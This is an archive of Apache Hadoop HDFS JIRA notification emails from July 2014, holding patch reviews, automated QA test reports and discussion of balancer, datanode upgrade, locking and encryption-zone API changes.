> h6685_20140730.patch, h6685_20140730b.patch, h6685_20140731.patch
>
>
> When Balancer moves replicas to balance the cluster, it should always move 
> replicas from a storage with any type to another storage with the same type, 
> i.e. it preserves storage type of replicas.  It does not make sense to move 
> replicas to a different storage type.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Comment Edited] (HDFS-6685) Balancer should preserve storage type of replicas

2014-07-31 Thread Tsz Wo Nicholas Sze (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6685?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081793#comment-14081793
 ] 

Tsz Wo Nicholas Sze edited comment on HDFS-6685 at 8/1/14 1:23 AM:
---

Thanks Arpit and Vinay for reviewing the patches.

I have committed this.


was (Author: szetszwo):
Thanks Arpit for reviewing the patches.

I have committed this.

> Balancer should preserve storage type of replicas
> -
>
> Key: HDFS-6685
> URL: https://issues.apache.org/jira/browse/HDFS-6685
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Reporter: Tsz Wo Nicholas Sze
>Assignee: Tsz Wo Nicholas Sze
> Fix For: 2.6.0
>
> Attachments: h6685_20140728.patch, h6685_20140729.patch, 
> h6685_20140730.patch, h6685_20140730b.patch, h6685_20140731.patch
>
>
> When Balancer moves replicas to balance the cluster, it should always move 
> replicas from a storage with any type to another storage with the same type, 
> i.e. it preserves storage type of replicas.  It does not make sense to move 
> replicas to a different storage type.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6796) Improving the argument check during balancer command line parsing

2014-07-31 Thread Tsz Wo Nicholas Sze (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6796?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Tsz Wo Nicholas Sze updated HDFS-6796:
--

  Priority: Minor  (was: Major)
Issue Type: Improvement  (was: Bug)

+1 patch looks good.

(You are right that we should use "<" but not "==".  Thanks.)

> Improving the argument check during balancer command line parsing
> -
>
> Key: HDFS-6796
> URL: https://issues.apache.org/jira/browse/HDFS-6796
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
>Priority: Minor
> Attachments: HDFS-6796.patch, HDFS-6796.patch
>
>
> Currently balancer CLI parser simply checks if the total number of arguments 
> is greater than 2 inside the loop. Since the check does not include any loop 
> variables, it is not a proper check when there more than 2 arguments.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6780) Batch the encryption zones listing API

2014-07-31 Thread Andrew Wang (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6780?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Andrew Wang updated HDFS-6780:
--

Attachment: hdfs-6780.002.patch

Fix a compile error

> Batch the encryption zones listing API
> --
>
> Key: HDFS-6780
> URL: https://issues.apache.org/jira/browse/HDFS-6780
> Project: Hadoop HDFS
>  Issue Type: Sub-task
>  Components: security
>Affects Versions: fs-encryption (HADOOP-10150 and HDFS-6134)
>Reporter: Andrew Wang
>Assignee: Andrew Wang
> Attachments: hdfs-6780.001.patch, hdfs-6780.002.patch
>
>
> To future-proof the API, it'd be better if the listEZs API returned a 
> RemoteIterator.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6788) Improve synchronization in BPOfferService with read write lock

2014-07-31 Thread Andrew Wang (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6788?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081789#comment-14081789
 ] 

Andrew Wang commented on HDFS-6788:
---

It looks like precommit isn't picking this up for some reason. I manually
triggered a build.


On Thu, Jul 31, 2014 at 5:41 PM, Arpit Agarwal (JIRA) 



> Improve synchronization in BPOfferService with read write lock
> --
>
> Key: HDFS-6788
> URL: https://issues.apache.org/jira/browse/HDFS-6788
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: Yongjun Zhang
>Assignee: Yongjun Zhang
> Attachments: HDFS-6788.001.patch, HDFS-6788.002.patch
>
>
> Threads in DN (DataXceiver, PacketResponder, Async disk worker etc) may block 
> at BPOfferService.getBlockPoolId() when calling BPOfferService.checkBlock(), 
> though they are just reading the same blockpool id. This is unnecessary 
> overhead and may cause performance hit when many threads compete. Filing this 
> jira to replace synchronized method with read write lock 
> (ReentrantReadWriteLock).



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6757) Simplify lease manager with INodeID

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6757?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081786#comment-14081786
 ] 

Hadoop QA commented on HDFS-6757:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12658724/HDFS-6757.004.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:green}+1 tests included{color}.  The patch appears to include 9 new 
or modified test files.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7517//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7517//console

This message is automatically generated.

> Simplify lease manager with INodeID
> ---
>
> Key: HDFS-6757
> URL: https://issues.apache.org/jira/browse/HDFS-6757
> Project: Hadoop HDFS
>  Issue Type: Improvement
>Reporter: Haohui Mai
>Assignee: Haohui Mai
> Attachments: HDFS-6757.000.patch, HDFS-6757.001.patch, 
> HDFS-6757.002.patch, HDFS-6757.003.patch, HDFS-6757.004.patch
>
>
> Currently the lease manager records leases based on path instead of inode 
> ids. Therefore, the lease manager needs to carefully keep track of the path 
> of active leases during renames and deletes. This can be a non-trivial task.
> This jira proposes to simplify the logic by tracking leases using inodeids 
> instead of paths.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6797) DataNode logs wrong layoutversion during upgrade

2014-07-31 Thread Arpit Agarwal (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6797?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Arpit Agarwal updated HDFS-6797:


  Resolution: Fixed
   Fix Version/s: 2.6.0
  3.0.0
Target Version/s: 2.6.0
Hadoop Flags: Reviewed
  Status: Resolved  (was: Patch Available)

Committed to trunk and branch-2. Thanks for the contribution [~benoyantony].

> DataNode logs wrong layoutversion during upgrade
> 
>
> Key: HDFS-6797
> URL: https://issues.apache.org/jira/browse/HDFS-6797
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Fix For: 3.0.0, 2.6.0
>
> Attachments: HDFS-6797.patch
>
>
> Before upgrade, data node version was -55. The new data node version remained 
> at -55. During upgrade we got he following messages:
> {code}
> 2014-07-15 12:59:55,253 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Data-node version: -55 and name-node layout version: -56
> ...
> ...
> ...
> ...
> 2014-07-15 12:59:56,479 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrading block pool storage directory 
> /hadoop/1/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239.
>old LV = -55; old CTime = 1402508907789.
>new LV = -56; new CTime = 1405453914270
> 2014-07-15 13:00:07,697 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrade of block pool BP-825373266-xx.xxx.xxx.xx-1379095203239 at 
> /hadoop/12/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239 is complete
> 2014-07-15 13:00:07,839 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: 
> Setting up storage: 
> nsid=859725752;bpid=BP-825373266-xx.xxx.xxx.xx-1379095203239;lv=-55;nsInfo=lv=-56;cid=CID-303ee504-e03c-4a5e-bc59-2b275b308152;nsid=859725752;c=1405453914270;bpid=BP-82537326
> 6-xx.xxx.xxx.xx-1379095203239;dnuuid=b1011b87-d7cd-48ce-92cc-f7cca0e8cbae
> {code}
> after upgrade completing, restart of DN still shows message regarding version 
> difference:
> {code}
> INFO org.apache.hadoop.hdfs.server.common.Storage: Data-node version: -55 and 
> name-node layout version: -56
> {code}
> This causes confusion to the operators as if upgrade did not succeed since 
> data node's layout version is not updated to the "new LV" value
> Actually name node's layout version is displayed as the "new LV" value.
> Since the data node and name node layout versions are separate now, the new 
> data node layout version should be shown as the “new LV”.  
> Thanks to [~ehf] who found and reported this issue.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6797) DataNode logs wrong layoutversion during upgrade

2014-07-31 Thread Arpit Agarwal (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6797?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Arpit Agarwal updated HDFS-6797:


Summary: DataNode logs wrong layoutversion during upgrade  (was: Misleading 
LayoutVersion information during data node upgrade)

> DataNode logs wrong layoutversion during upgrade
> 
>
> Key: HDFS-6797
> URL: https://issues.apache.org/jira/browse/HDFS-6797
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6797.patch
>
>
> Before upgrade, data node version was -55. The new data node version remained 
> at -55. During upgrade we got he following messages:
> {code}
> 2014-07-15 12:59:55,253 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Data-node version: -55 and name-node layout version: -56
> ...
> ...
> ...
> ...
> 2014-07-15 12:59:56,479 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrading block pool storage directory 
> /hadoop/1/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239.
>old LV = -55; old CTime = 1402508907789.
>new LV = -56; new CTime = 1405453914270
> 2014-07-15 13:00:07,697 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrade of block pool BP-825373266-xx.xxx.xxx.xx-1379095203239 at 
> /hadoop/12/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239 is complete
> 2014-07-15 13:00:07,839 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: 
> Setting up storage: 
> nsid=859725752;bpid=BP-825373266-xx.xxx.xxx.xx-1379095203239;lv=-55;nsInfo=lv=-56;cid=CID-303ee504-e03c-4a5e-bc59-2b275b308152;nsid=859725752;c=1405453914270;bpid=BP-82537326
> 6-xx.xxx.xxx.xx-1379095203239;dnuuid=b1011b87-d7cd-48ce-92cc-f7cca0e8cbae
> {code}
> after upgrade completing, restart of DN still shows message regarding version 
> difference:
> {code}
> INFO org.apache.hadoop.hdfs.server.common.Storage: Data-node version: -55 and 
> name-node layout version: -56
> {code}
> This causes confusion to the operators as if upgrade did not succeed since 
> data node's layout version is not updated to the "new LV" value
> Actually name node's layout version is displayed as the "new LV" value.
> Since the data node and name node layout versions are separate now, the new 
> data node layout version should be shown as the “new LV”.  
> Thanks to [~ehf] who found and reported this issue.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-4916) DataTransfer may mask the IOException during block transfering

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-4916?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081782#comment-14081782
 ] 

Hadoop QA commented on HDFS-4916:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12588510/4916.v0.patch
  against trunk revision .

{color:red}-1 patch{color}.  The patch command could not apply the patch.

Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7519//console

This message is automatically generated.

> DataTransfer may mask the IOException during block transfering
> --
>
> Key: HDFS-4916
> URL: https://issues.apache.org/jira/browse/HDFS-4916
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.0.4-alpha, 2.0.5-alpha
>Reporter: Zesheng Wu
>Priority: Critical
> Attachments: 4916.v0.patch
>
>
> When a new datanode is added to the pipeline, the client will trigger the 
> block transfer process. In the current implementation, the src datanode calls 
> the run() method of the DataTransfer to transfer the block, this method will 
> mask the IOExceptions during the transfering, and will make the client not 
> realize the failure during the transferring, as a result the client will 
> mistake the failing transferring as successful one. 



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6797) Misleading LayoutVersion information during data node upgrade

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6797?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081778#comment-14081778
 ] 

Hadoop QA commented on HDFS-6797:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12658983/HDFS-6797.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:red}-1 tests included{color}.  The patch doesn't appear to include 
any new or modified tests.
Please justify why no new tests are needed for this 
patch.
Also please list what manual steps were performed to 
verify this patch.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7516//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7516//console

This message is automatically generated.

> Misleading LayoutVersion information during data node upgrade
> -
>
> Key: HDFS-6797
> URL: https://issues.apache.org/jira/browse/HDFS-6797
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6797.patch
>
>
> Before upgrade, data node version was -55. The new data node version remained 
> at -55. During upgrade we got he following messages:
> {code}
> 2014-07-15 12:59:55,253 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Data-node version: -55 and name-node layout version: -56
> ...
> ...
> ...
> ...
> 2014-07-15 12:59:56,479 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrading block pool storage directory 
> /hadoop/1/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239.
>old LV = -55; old CTime = 1402508907789.
>new LV = -56; new CTime = 1405453914270
> 2014-07-15 13:00:07,697 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrade of block pool BP-825373266-xx.xxx.xxx.xx-1379095203239 at 
> /hadoop/12/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239 is complete
> 2014-07-15 13:00:07,839 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: 
> Setting up storage: 
> nsid=859725752;bpid=BP-825373266-xx.xxx.xxx.xx-1379095203239;lv=-55;nsInfo=lv=-56;cid=CID-303ee504-e03c-4a5e-bc59-2b275b308152;nsid=859725752;c=1405453914270;bpid=BP-82537326
> 6-xx.xxx.xxx.xx-1379095203239;dnuuid=b1011b87-d7cd-48ce-92cc-f7cca0e8cbae
> {code}
> after upgrade completing, restart of DN still shows message regarding version 
> difference:
> {code}
> INFO org.apache.hadoop.hdfs.server.common.Storage: Data-node version: -55 and 
> name-node layout version: -56
> {code}
> This causes confusion to the operators as if upgrade did not succeed since 
> data node's layout version is not updated to the "new LV" value
> Actually name node's layout version is displayed as the "new LV" value.
> Since the data node and name node layout versions are separate now, the new 
> data node layout version should be shown as the “new LV”.  
> Thanks to [~ehf] who found and reported this issue.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6685) Balancer should preserve storage type of replicas

2014-07-31 Thread Arpit Agarwal (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6685?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081762#comment-14081762
 ] 

Arpit Agarwal commented on HDFS-6685:
-

+1 for the latest patch.

> Balancer should preserve storage type of replicas
> -
>
> Key: HDFS-6685
> URL: https://issues.apache.org/jira/browse/HDFS-6685
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Reporter: Tsz Wo Nicholas Sze
>Assignee: Tsz Wo Nicholas Sze
> Attachments: h6685_20140728.patch, h6685_20140729.patch, 
> h6685_20140730.patch, h6685_20140730b.patch, h6685_20140731.patch
>
>
> When Balancer moves replicas to balance the cluster, it should always move 
> replicas from a storage with any type to another storage with the same type, 
> i.e. it preserves storage type of replicas.  It does not make sense to move 
> replicas to a different storage type.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6797) Misleading LayoutVersion information during data node upgrade

2014-07-31 Thread Arpit Agarwal (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6797?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081755#comment-14081755
 ] 

Arpit Agarwal commented on HDFS-6797:
-

Pending Jenkins.

> Misleading LayoutVersion information during data node upgrade
> -
>
> Key: HDFS-6797
> URL: https://issues.apache.org/jira/browse/HDFS-6797
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6797.patch
>
>
> Before upgrade, data node version was -55. The new data node version remained 
> at -55. During upgrade we got he following messages:
> {code}
> 2014-07-15 12:59:55,253 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Data-node version: -55 and name-node layout version: -56
> ...
> ...
> ...
> ...
> 2014-07-15 12:59:56,479 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrading block pool storage directory 
> /hadoop/1/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239.
>old LV = -55; old CTime = 1402508907789.
>new LV = -56; new CTime = 1405453914270
> 2014-07-15 13:00:07,697 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrade of block pool BP-825373266-xx.xxx.xxx.xx-1379095203239 at 
> /hadoop/12/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239 is complete
> 2014-07-15 13:00:07,839 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: 
> Setting up storage: 
> nsid=859725752;bpid=BP-825373266-xx.xxx.xxx.xx-1379095203239;lv=-55;nsInfo=lv=-56;cid=CID-303ee504-e03c-4a5e-bc59-2b275b308152;nsid=859725752;c=1405453914270;bpid=BP-82537326
> 6-xx.xxx.xxx.xx-1379095203239;dnuuid=b1011b87-d7cd-48ce-92cc-f7cca0e8cbae
> {code}
> after upgrade completing, restart of DN still shows message regarding version 
> difference:
> {code}
> INFO org.apache.hadoop.hdfs.server.common.Storage: Data-node version: -55 and 
> name-node layout version: -56
> {code}
> This causes confusion to the operators as if upgrade did not succeed since 
> data node's layout version is not updated to the "new LV" value
> Actually name node's layout version is displayed as the "new LV" value.
> Since the data node and name node layout versions are separate now, the new 
> data node layout version should be shown as the “new LV”.  
> Thanks to [~ehf] who found and reported this issue.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6798) Add test case for incorrect data node condition during balancing

2014-07-31 Thread Arpit Agarwal (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6798?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081753#comment-14081753
 ] 

Arpit Agarwal commented on HDFS-6798:
-

+1 for the patch, pending Jenkins.

Thanks for adding this test case Benoy!

> Add test case for incorrect data node condition during balancing
> 
>
> Key: HDFS-6798
> URL: https://issues.apache.org/jira/browse/HDFS-6798
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6798.patch
>
>
> The Balancer makes a check to see if a block's location is a known data node. 
> But the variable it uses to check is wrong. This issue was fixed in HDFS-6364.
> There was no way to easily unit test it at that time. Since HDFS-6441 enables 
> one to simulate this case, it was decided to add the unit test once HDFS-6441 
> is resolved.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6788) Improve synchronization in BPOfferService with read write lock

2014-07-31 Thread Arpit Agarwal (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6788?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081748#comment-14081748
 ] 

Arpit Agarwal commented on HDFS-6788:
-

Thanks Andrew/Yongjun for verifying the lock order correctness.

Just reviewed and +1 from me also, pending Jenkins.

> Improve synchronization in BPOfferService with read write lock
> --
>
> Key: HDFS-6788
> URL: https://issues.apache.org/jira/browse/HDFS-6788
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: Yongjun Zhang
>Assignee: Yongjun Zhang
> Attachments: HDFS-6788.001.patch, HDFS-6788.002.patch
>
>
> Threads in DN (DataXceiver, PacketResponder, Async disk worker etc) may block 
> at BPOfferService.getBlockPoolId() when calling BPOfferService.checkBlock(), 
> though they are just reading the same blockpool id. This is unnecessary 
> overhead and may cause performance hit when many threads compete. Filing this 
> jira to replace synchronized method with read write lock 
> (ReentrantReadWriteLock).



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6796) Improving the argument check during balancer command line parsing

2014-07-31 Thread Benoy Antony (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6796?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benoy Antony updated HDFS-6796:
---

Attachment: HDFS-6796.patch

Makes sense. Thanks for the review and suggestion, [~szetszwo].
I have updated the patch with individual checks for each option. 

> Improving the argument check during balancer command line parsing
> -
>
> Key: HDFS-6796
> URL: https://issues.apache.org/jira/browse/HDFS-6796
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6796.patch, HDFS-6796.patch
>
>
> Currently balancer CLI parser simply checks if the total number of arguments 
> is greater than 2 inside the loop. Since the check does not include any loop 
> variables, it is not a proper check when there more than 2 arguments.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6800) Detemine how Datanode layout changes should interact with rolling upgrade

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6800?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081743#comment-14081743
 ] 

Colin Patrick McCabe commented on HDFS-6800:


Just to give a bit of additional context here: [~james.thomas] did some 
benchmarks that showed that "creating 200k hard links (100k blocks) take just 
over a second on a dual core PC" when using the optimized hard link code.  On a 
performance basis, I think it's very feasible to support rolling upgrade to new 
DN layout versions.

If we don't choose to support this, we are going to make it very hard to evolve 
the DN code in the future.  We would then require a major version change (i.e. 
Hadoop 3.0) to make any major DN changes.  So I think we should just change the 
documentation a bit and support this in the obvious way... by having the users 
call {{datanode \-rollback}} during a rolling rollback if needed.  What do you 
guys think?

> Detemine how Datanode layout changes should interact with rolling upgrade
> -
>
> Key: HDFS-6800
> URL: https://issues.apache.org/jira/browse/HDFS-6800
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: datanode
>Affects Versions: 2.6.0
>Reporter: Colin Patrick McCabe
>
> We need to handle attempts to rolling-upgrade the DataNode to a new storage 
> directory layout.
> One approach is to disallow such upgrades.  If we choose this approach, we 
> should make sure that the system administrator gets a helpful error message 
> and a clean failure when trying to use rolling upgrade to a version that 
> doesn't support it.  Based on the compatibility guarantees described in 
> HDFS-5535, this would mean that *any* future DataNode layout changes would 
> require a major version upgrade.
> Another approach would be to support rolling upgrade from an old DN storage 
> layout to a new layout.  This approach requires us to change our 
> documentation to explain to users that they should supply the {{\-rollback}} 
> command on the command-line when re-starting the DataNodes during rolling 
> rollback.  Currently the documentation just says to restart the DataNode 
> normally.
> Another issue here is that the DataNode's usage message describes rollback 
> options that no longer exist.  The help text says that the DN supports 
> {{\-rollingupgrade rollback}}, but this option was removed by HDFS-6005.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Work started] (HDFS-6780) Batch the encryption zones listing API

2014-07-31 Thread Andrew Wang (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6780?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Work on HDFS-6780 started by Andrew Wang.

> Batch the encryption zones listing API
> --
>
> Key: HDFS-6780
> URL: https://issues.apache.org/jira/browse/HDFS-6780
> Project: Hadoop HDFS
>  Issue Type: Sub-task
>  Components: security
>Affects Versions: fs-encryption (HADOOP-10150 and HDFS-6134)
>Reporter: Andrew Wang
>Assignee: Andrew Wang
> Attachments: hdfs-6780.001.patch
>
>
> To future-proof the API, it'd be better if the listEZs API returned a 
> RemoteIterator.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6780) Batch the encryption zones listing API

2014-07-31 Thread Andrew Wang (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6780?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Andrew Wang updated HDFS-6780:
--

Affects Version/s: fs-encryption (HADOOP-10150 and HDFS-6134)

> Batch the encryption zones listing API
> --
>
> Key: HDFS-6780
> URL: https://issues.apache.org/jira/browse/HDFS-6780
> Project: Hadoop HDFS
>  Issue Type: Sub-task
>  Components: security
>Affects Versions: fs-encryption (HADOOP-10150 and HDFS-6134)
>Reporter: Andrew Wang
>Assignee: Andrew Wang
> Attachments: hdfs-6780.001.patch
>
>
> To future-proof the API, it'd be better if the listEZs API returned a 
> RemoteIterator.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6482) Use block ID-based block layout on datanodes

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6482?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081739#comment-14081739
 ] 

Colin Patrick McCabe commented on HDFS-6482:


Hey guys, I filed HDFS-6800 to have the rolling upgrade discussion.  I'm going 
to commit this to trunk (but *not* to any other branches) in a bit if nobody 
has any objections.

> Use block ID-based block layout on datanodes
> 
>
> Key: HDFS-6482
> URL: https://issues.apache.org/jira/browse/HDFS-6482
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: James Thomas
>Assignee: James Thomas
> Attachments: 6482-design.doc, HDFS-6482.1.patch, HDFS-6482.2.patch, 
> HDFS-6482.3.patch, HDFS-6482.4.patch, HDFS-6482.5.patch, HDFS-6482.6.patch, 
> HDFS-6482.7.patch, HDFS-6482.8.patch, HDFS-6482.9.patch, HDFS-6482.patch, 
> hadoop-24-datanode-dir.tgz
>
>
> Right now blocks are placed into directories that are split into many 
> subdirectories when capacity is reached. Instead we can use a block's ID to 
> determine the path it should go in. This eliminates the need for the LDir 
> data structure that facilitates the splitting of directories when they reach 
> capacity as well as fields in ReplicaInfo that keep track of a replica's 
> location.
> An extension of the work in HDFS-3290.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6788) Improve synchronization in BPOfferService with read write lock

2014-07-31 Thread Andrew Wang (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6788?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081736#comment-14081736
 ] 

Andrew Wang commented on HDFS-6788:
---

I don't see any cases where a thread with the read lock would try to get the 
write lock. The four methods that take the read lock are getNamespaceInfo, 
getActiveNN, getBlockPoolId, and toString, and they all look safe.

+1 pending Jenkins from me.

Yongjun, for the indirection, it's probably not a big deal since the JIT is 
pretty likely to inline it. Unless we see this crop up as an issue, I'm 
inclined not to bother since we have much bigger perf issues (for instance, 
that there is a global RW lock).

> Improve synchronization in BPOfferService with read write lock
> --
>
> Key: HDFS-6788
> URL: https://issues.apache.org/jira/browse/HDFS-6788
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: Yongjun Zhang
>Assignee: Yongjun Zhang
> Attachments: HDFS-6788.001.patch, HDFS-6788.002.patch
>
>
> Threads in DN (DataXceiver, PacketResponder, Async disk worker etc) may block 
> at BPOfferService.getBlockPoolId() when calling BPOfferService.checkBlock(), 
> though they are just reading the same blockpool id. This is unnecessary 
> overhead and may cause performance hit when many threads compete. Filing this 
> jira to replace synchronized method with read write lock 
> (ReentrantReadWriteLock).



--
